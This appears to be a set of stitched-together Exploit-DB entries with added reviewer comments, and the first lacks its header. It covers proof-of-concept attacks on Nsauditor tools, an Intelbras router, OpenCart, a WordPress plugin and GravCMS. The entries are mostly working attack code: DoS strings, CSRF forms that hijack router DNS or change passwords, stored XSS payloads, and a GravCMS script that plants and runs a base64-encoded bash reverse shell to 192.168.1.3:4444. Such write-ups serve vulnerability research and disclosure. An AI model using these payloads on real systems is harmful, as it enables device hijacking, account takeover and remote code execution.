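#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Open Nsauditor.exe
#3.- Go to Register > Enter Registration Code...
#4.- Write anything in 'Name' field
#5.- Paste clipboard in 'Key' field
#6.- Click on button -> Ok

# NOTE(review): step 1 speaks of a *printed* string, but this script only
# writes it to NBM.txt in the current directory (the file name is carried
# over from the NBMonitor PoC by the same author); open that file to copy it.
# The whole PoC is a 256-byte run of 'A' (0x41); nothing is sent or executed.
buffer = "\x41" * 256

# Context manager so the handle is closed even if the write raises
# (the original open()/write()/close() sequence leaked it on error).
with open("NBM.txt", "w") as f:
    f.write(buffer)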
Backup Key Recovery 2.2.7 - Denial of Service (PoC)
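# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo
# Vendor Homepage: http://www.nsauditor.com
# Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Version: 2.2.7.0
# Tested on: Windows 10 Pro x64 es

# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Open BackupKeyRecovery.exe
#3.- Go to Register > Enter Registration Code...
#4.- Write anything in 'Name' field
#5.- Paste clipboard in 'Key' field
#6.- Click on button -> Ok

# NOTE(review): step 1 speaks of a *printed* string, but this script only
# writes it to poc.txt in the current directory; open that file to copy it.
# The whole PoC is a 256-byte run of 'A' (0x41); nothing is sent or executed.
buffer = "\x41" * 256

# Context manager so the handle is closed even if the write raises
# (the original open()/write()/close() sequence leaked it on error).
with open("poc.txt", "w") as f:
    f.write(buffer)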
Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)
# Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF) # Date: 01/05/2021 # Exploit Author: Rodolfo Mariano # Version: Firmware 1.1.2-1.1.5 # CVE: 2021-32403 # Exploit Code: <html> <form action="http://10.0.0.1/goform/setSysTools" method="POST"> <input name="module3" value="lanCfg" type="hidden"> <input name="lanIP" value="10.0.0.1" type="hidden"> <input name="lanMask" value="255.255.255.0" type="hidden"> <input name="dhcpEn" value="true" type="hidden"> <input name="lanDhcpStartIP" value="10.0.0.100" type="hidden"> <input name="lanDhcpEndIP" value="10.0.0.200" type="hidden"> <input name="lanDns1" value="192.168.0.30" type="hidden"> <input name="lanDns2" value="" type="hidden"> </form> <script> document.forms[0].submit(); </script> </html>
OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)
# Exploit Title : OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF) # Date : 2021/08/06 # Exploit Author : Mert Daş [email protected] # Software Link : http://www.opencart.com/index.php?route=download/download : https://github.com/opencart # Software web : www.opencart.com # Tested on: Server : Xampp # Cross-site request forgery OpenCart is an open source shopping cart system that suffers from cross-site request forgery, through which an attacker can manipulate user data by sending the victim a maliciously crafted URL. OpenCart does not use any security token to protect against CSRF. Every location inside the User panel is vulnerable. Header ---------------------------------------------------------- http://localhost/index.php?route=account/password POST /opencart/index.php?route=account/password HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675 Content-Length: 300 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/opencart/index.php?route=account/password Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0 Upgrade-Insecure-Requests: 1 -----------------------------3890527419799841332130342675 Content-Disposition: form-data; name="password" 123asd! -----------------------------3890527419799841332130342675 Content-Disposition: form-data; name="confirm" 123asd! 
-----------------------------3890527419799841332130342675-- Response HTTP/1.1 302 Found Date: Tue, 08 Jun 2021 16:52:59 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20 X-Powered-By: PHP/7.4.20 Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/ Location: http://127.0.0.1/opencart/index.php?route=account/account Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 ---------------------------------------------------------- Simple Poc to change user Password <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/opencart/index.php?route=account/password" method="POST" enctype="multipart/form-data"> <input type="hidden" name="password" value="1234asd!" /> <input type="hidden" name="confirm" value="1234asd!" /> <input type="submit" value="Submit request" /> </form> </body> </html>
-
OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting # Date: 2021/08/06 # Exploit Author: Mert Daş # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: 3.0.3.7 (the title says 3.0.3.6; the advisory does not state which build was tested) # Tested on: Windows 10 Stored Cross-site scripting (XSS): Stored (persistent) XSS is the more damaging of the two XSS variants: the malicious script is saved by the vulnerable application and served to every user who later views the affected content. Attack vector: The Subject field of Marketing > Mail is not sanitized, so a payload placed there is stored and, according to the author, executes in the browser of any user who later opens that mail, where it can steal that user's cookie or act in their session. Note that reaching this form requires admin-panel access (the request below carries the admin user_token), so the realistic attacker is someone who already holds, or can drive, an admin session and targets whoever later renders the stored subject. Vulnerable Parameters: Subject of mail. Steps-To-Reproduce: 1. Go to the OpenCart admin page. 2. Go to Marketing > Mail. 3. Put the payload below in the Subject field of the mail: "<script>alert(11111)</script>" (the captured request uses the equivalent alert(1)). 4. Click the Send button. 5. The XSS is triggered. POST /opencart/admin/index.php?route=marketing/contact/send&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 187 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/opencart/admin/index.php?route=marketing/contact&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0 store_id=0&to=customer_all&customer_group_id=1&customers=&affiliates=&products=&subject=%3Cscript%3Ealert(1)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self
-
WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS) # Date: 09/06/2021 # Exploit Author: Mesut Cetin # Vendor Homepage: https://profiles.wordpress.org/domingoruiz/ # Software Link: https://wordpress.org/plugins/visitors-app/ # Version: 0.3 # Tested on: Debian GNU/Linux 10 # Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc ## Description: # The WordPress plugin "visitors" version 0.3 and prior records the User-Agent header of each request and # renders it unescaped in the admin "visitors" tab. An unauthenticated remote attacker can therefore plant # JavaScript that runs in the browser of any administrator who opens that tab; the author notes this can be # used to redirect the administrator, read what the admin session can see, and potentially escalate to # admin-level actions. ## PoC # Replace google.com with the attacker's page. The payload builds the URL string from a regex literal so the # header contains no quote characters. curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>" # Then, as an administrator, open http://localhost/wordpress/wp-admin and browse to the "visitors" tab; the # stored script executes there.
-
GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)
# Exploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2) # Original Exploit Author: Mehmet Ince # Vendor Homepage: https://getgrav.org # Version: 1.10.7 # Tested on: Debian 10 # Author: legend #/usr/bin/python3 import requests import sys import re import base64 target= "http://192.168.1.2" #Change base64 encoded value with with below command. #echo -ne "bash -i >& /dev/tcp/192.168.1.3/4444 0>&1" | base64 -w0 payload=b"""/*<?php /**/ file_put_contents('/tmp/rev.sh',base64_decode('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMy80NDQ0IDA+JjE='));chmod('/tmp/rev.sh',0755);system('bash /tmp/rev.sh'); """ s = requests.Session() r = s.get(target+"/admin") adminNonce = re.search(r'admin-nonce" value="(.*)"',r.text).group(1) if adminNonce != "" : url = target + "/admin/tools/scheduler" data = "admin-nonce="+adminNonce data +='&task=SaveDefault&data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php&data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22'+base64.b64encode(payload).decode('utf-8')+'%22%29%29%3b&data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a&data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=&data%5bstatus%5d%5bncefs%5d=enabled&data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append' headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = s.post(target+"/admin/config/scheduler",data=data,headers=headers)